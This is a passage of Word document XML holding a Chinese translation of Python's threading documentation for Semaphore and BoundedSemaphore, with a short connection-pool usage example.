          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC908A6" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415D9123" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class threading.Semaphore(value=1)¶</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D95B478" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该类实现信号量对象。信号量对象管理一个原子性的计数器，代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> release() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法的调用次数减去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquire() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的调用次数再加上一个初始值。如果需要，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquire() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将会阻塞直到可以返回而不会使得计数器变成负数。在没有显式给出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值时，默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333947BF" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3782304C" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可选参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋予内部计数器初始值，默认值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被赋予小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，将会引发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ValueError </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18839925" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B96E980" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从工厂函数变为类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37888ACC" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C418FE6" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>acquire(blocking=True, timeout=None)¶</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A3196" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取一个信号量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D28D3" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0363FE9F" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在不带参数的情况下调用时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2BD6AE" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D79E89" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在进入时内部计数器的值大于零，则将其减一并立即返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E9D8FF" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A365F58" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在进入时内部计数器的值为零，则将会阻塞直到被对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> release() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的调用唤醒。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦被唤醒（并且计数器的值大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），则将计数器减</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每次对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> release() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的调用将只唤醒一个线程。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程被唤醒的次序是不可确定的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F468FE" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656CB0B0" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> blocking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时调用，不会阻塞。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没有参数的调用会阻塞，立即返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；否则，做与无参数调用相同的事情时返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C336AB" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D14F2B8" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当发起调用时如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则它将阻塞最多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求在此时段时未能成功完成获取则将返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在其他情况下返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B06A51" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EB6770" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>形参。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC0E81" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F52408" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>release(n=1)¶</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B743772" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放一个信号量，将内部计数器的值增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当进入时值为零且有其他线程正在等待它再次变为大于零时，则唤醒那</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个线程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148009E0" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F079AB7" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>形参以一次性释放多个等待线程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C704C5" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0ECC70" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class threading.BoundedSemaphore(value=1)¶</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C5BA7B" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该类实现有界信号量。有界信号量通过检查以确保它当前的值不会超过初始值。如果超过了初始值，将会引发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ValueError </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常。在大多情况下，信号量用于保护数量有限的资源。如果信号量被释放的次数过多，则表明出现了错误。没有指定时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598FD9B2" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9F79C5" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从工厂函数变为类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F814A" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DFBE23" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Semaphore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子¶</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E1EC7" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信号量通常用于保护数量有限的资源，例如数据库服务器。在资源数量固定的任何情况下，都应该使用有界信号量。在生成任何工作线程前，应该在主线程中初始化信号量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F9EDF" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BE9E1D" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>maxconnections = 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C494DB" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F52A0" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pool_sema = BoundedSemaphore(value=maxconnections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60619F63" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作线程生成后，当需要连接服务器时，这些线程将调用信号量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> acquire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> release </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C7BF3" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719BCABA" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with pool_sema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD3D48" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    conn = connectdb()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4A26F" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C386DC4" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        # ... use connection ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7DDBB" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03622D7F" w14:textId="77777777" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64645BAC" w14:textId="68781D74" w:rsidR="00AF5D95" w:rsidRDefault="00AF5D95" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
